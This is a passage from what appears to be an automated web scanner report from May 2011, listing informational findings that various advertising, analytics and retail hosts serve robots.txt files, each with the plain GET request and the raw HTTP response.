User-agent: *
Disallow: /

22.12. http://altfarm.mediaplex.com/ad/bk/17038-128025-3840-0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/bk/17038-128025-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 16 May 2011 02:00:28 GMT
Connection: keep-alive

User-agent: *
Disallow: /

22.13. http://american.redcross.org/site/PageServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://american.redcross.org
Path:   /site/PageServer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: american.redcross.org

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:05 GMT
Server: Apache
Last-Modified: Thu, 13 Sep 2001 00:25:08 GMT
ETag: "1af36c0-b4-3b9ffce4"
Accept-Ranges: bytes
Content-Length: 180
Keep-Alive: timeout=8, max=500
Connection: Keep-Alive
Content-Type: text/plain

# $Header: /home/cvs/cvsroot/site_data/001/00000001/static_data/robots.txt,v 1.4 2001/09/13 00:25:08 dave Exp $
User-agent: *
Disallow: /site/Calendar
Disallow: /site/TellAFriend


22.14. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.15. http://beacon.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:35 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


22.16. http://bluefly-www.baynote.net/baynote/tags2/policy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bluefly-www.baynote.net
Path:   /baynote/tags2/policy

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bluefly-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1305510604000"
Last-Modified: Mon, 16 May 2011 01:50:04 GMT
Content-Type: text/plain
Content-Length: 216
Date: Mon, 16 May 2011 02:02:52 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

22.17. http://bluefly.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bluefly.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bluefly.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:13 GMT
Vary: Host,Accept-Encoding
Last-Modified: Thu, 28 Apr 2011 14:44:20 GMT
ETag: "b825-3bd-4a1fb97a6d900"
Accept-Ranges: bytes
Content-Length: 957
Content-Type: text/plain
Set-Cookie: TLTHID=604A78DE7F60107F23DE80EF47F03CD2; Path=/
Set-Cookie: TLTSID=604A78DE7F60107F23DE80EF47F03CD2; Path=/
RTSS: 1
Keep-Alive: timeout=5, max=250
Connection: close
Set-Cookie: TS18d374=e3776ce2d9704d0b456b3305825445dc583d9b50696a1f874dd08568; Path=/

User-agent: *
Allow: /
Disallow: /myfly/
Disallow: /myaccount/
Disallow: /cart/
Disallow: /browse/quickLogin.jsp
Disallow: /browse/pdpQuickAdd.jsp
Disallow: /browse/f_quick_buy.jsp
Disallow: /
...[SNIP]...

22.18. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:57:38 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.19. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /TGI2/proc/stateselector.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy.travelguard.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 23 Apr 2008 22:26:26 GMT
Accept-Ranges: bytes
ETag: "0d5591191a5c81:1ea23"
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:21 GMT
Connection: close

User-agent: *
Disallow: /

22.20. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "359150-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www270
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.21. http://cimg-1.restorationhardware.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cimg-1.restorationhardware.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cimg-1.restorationhardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "3d152a-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=976
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.22. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:54:55 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.23. http://community.petco.com/n/pfx/forum.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.petco.com
Path:   /n/pfx/forum.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.petco.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 02:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Served: DC2WEB030 5/15/2011 10:01:13 PM, 0 wait
Cache-Control: public, max-age=900
Expires: Mon, 16 May 2011 02:16:13 GMT
Last-Modified: Tue, 10 May 2011 18:05:43 GMT
Content-Type: text/plain
Content-Length: 106

User-Agent: *
Sitemap: http://community.petco.com/n/SiteMap.aspx?webtag=fd03pz&sitemapid=0
Disallow:


22.24. http://customerappreciation.petco.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customerappreciation.petco.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: customerappreciation.petco.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:25 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "17573c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=974
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.25. http://d.xp1.ru4.com/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

22.26. http://data.coremetrics.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "1fc85c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=797
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.27. http://dis.us.criteo.com/dis/dis.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 02:01:30 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.28. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dms.netmng.com

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Thu, 31 Aug 2006 14:18:42 GMT
Accept-Ranges: bytes
ETag: "bbd5705c8cdc61:2196"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:27 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /SI/CM/

22.29. http://feeds.bbci.co.uk/news/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=2324
Expires: Mon, 16 May 2011 11:19:51 GMT
Date: Mon, 16 May 2011 10:41:07 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

22.30. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:53:14 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.31. http://gnc.imageg.net/min-cat/site-css.xml.min.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gnc.imageg.net
Path:   /min-cat/site-css.xml.min.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gnc.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "67872c-12a-4a17de6ae2900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:42 GMT
Date: Mon, 16 May 2011 01:57:42 GMT
Content-Length: 298
Connection: close

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /emailFriend/
Disallow: /emailSignup/

...[SNIP]...

22.32. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052618686/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1052618686/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:55:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.33. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s01026654783636

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /b/ss/gsicace/1/H.20.3/s01026654783636

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:12 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2602fa-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www423
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.34. http://hire.jobvite.com/CompanyJobs/Careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hire.jobvite.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 20 Jul 2010 18:27:10 GMT
Accept-Ranges: bytes
ETag: "093692a3928cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Connection: close
Content-Length: 210

##############################
# Exclude robots from these

User-agent: *
Disallow: /Jobs/
Disallow: /Login/
Disallow: /CompanyJobs/PreviewApplication.aspx


###############################
...[SNIP]...

22.35. http://images.scanalert.com/meter/www.mcafee.com/55.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.scanalert.com
Path:   /meter/www.mcafee.com/55.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Pnr"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 44
Date: Mon, 16 May 2011 02:06:37 GMT
Connection: close
Cache-Control: private

# Allow Everything
User-agent: *
Disallow:

22.36. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1305510844293361; path=/
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500070-a2-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

22.37. http://marketlive.122.2o7.net/b/ss/mlhelzbprod/1/H.20.3/s05609032628126

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /b/ss/mlhelzbprod/1/H.20.3/s05609032628126

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2882ec-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www45
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.38. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox12.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"25-1299290853000"
Accept-Ranges: bytes
Content-Length: 25
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close
Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

22.39. http://media.gnc.com/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /ipixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:58:34 GMT
Last-Modified: Thu, 22 Sep 2005 15:46:15 GMT
ETag: "1a-4332d1c7"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.40. http://media.gsimedia.net/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /ipixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.gsimedia.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:28 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:56:28 GMT
Last-Modified: Thu, 22 Sep 2005 15:46:15 GMT
ETag: "1a-4332d1c7"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.41. http://media2.legacy.com/bind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /bind

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

22.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /b/ss/bstoneprod/1/H.21/s01194140000734

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "26023c-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www276
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.43. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s04212323604151

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s04212323604151

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:38 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "21914a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www335
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.44. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s06308770310133

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /b/ss/gsicgncf/1/H.20.3/s06308770310133

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:44 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "30c178-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www611
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.45. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s0464884343091

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /b/ss/mcafeecomglobal/1/H.21/s0464884343091

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "29d14a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www297
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.46. http://metrics.pacsun.com/b/ss/pacsuncom/1/H.21/s03375264031346

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /b/ss/pacsuncom/1/H.21/s03375264031346

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "612f5b-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www2
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.47. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s02726066182367

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /b/ss/gsicpet/1/H.20.3/s02726066182367

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "37018e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www628
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.48. http://mlarmani.122.2o7.net/b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:01 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1781c9-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www425
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.49. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83094420
Expires: Thu, 02 Jan 2014 04:28:05 GMT
Date: Mon, 16 May 2011 10:41:05 GMT
Connection: close

User-agent: *
Disallow: /

22.50. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1b0236-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www434
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.51. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ordering.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:01 GMT
Server: Apache
Set-Cookie: TLTSID=9B29B4147F61107F00208AA83DF009D5; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9B29B4147F61107F00208AA83DF009D5; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 02:10:01 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 19 Jan 2011 03:55:49 GMT
ETag: "ba-4d3660c5"
Accept-Ranges: bytes
Content-Length: 186
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /1
Disallow: /2
Disallow: /3
Disallow: /4
Disallow: /5
Disallow: /6
Disallow: /7
Disallow: /8
Disallow: /9

Allow: /350/

Sitemap: http://www.ftd.com/sitemap.xml

22.52. http://pet.imageg.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pet.imageg.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pet.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:49:57 GMT
Date: Mon, 16 May 2011 10:49:57 GMT
Content-Length: 347
Connection: close

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

22.53. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x2 pid 0x6ff 1791
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.54. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
